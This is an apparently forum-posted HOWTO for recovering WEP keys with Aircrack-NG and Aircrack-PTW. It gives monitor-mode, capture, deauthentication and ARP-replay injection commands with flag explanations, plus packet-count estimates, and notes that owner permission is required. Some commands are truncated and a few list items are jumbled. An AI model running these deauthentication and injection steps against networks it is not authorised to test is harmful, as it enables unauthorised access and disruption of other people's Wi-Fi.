This HOWTO is widely based on Aircrack's own documentation. In addition you'll find the latest version of "Aircrack Next Generation" here and Aircrack-PTW here.
Any sort of suggestion for improvement is welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe the brevity is the soul of wit. Also note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network.
Generally speaking there are 3 types of attacks:
1. Brute force attackBy exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.
2. Dictionary attack
3. Statistical attack
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won't go into this. I have tested packet injection and decryption with:
1. Intel® PRO/Wireless 2200BG (IPW2200)I recommend "Linksys WUSB54G V4.0" as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.
2. Linksys WUSB54G V4.0 (RT2570)
1. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
2. '00:09:6B:D7:33:A9 is the MAC address of my network, so you need to replace it with your own.
3. '00:00:00:00:00:00' is the MAC address of the target client, NOT that of your own wireless card.
Please make sure that you stick to the exact sequence of actions (pay attention to #3 in particular as #4 won't yield any results if you skip it).
sudo airmon-ng start
sudo airodump-ng --channel
sudo airodump-ng --channel
--channel... Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
--bssid... MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
--write... Preferred file name; mandatory field (in our case).
sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00
-0... Number of deauthentication attempts.
-a... MAC address of target access point.
-c... Client MAC address.
sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00
-3... Standard ARP-request replay.
-b... MAC address of target access point.
-h... Client MAC address.
This is a summary based on information given here and there, respectively:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets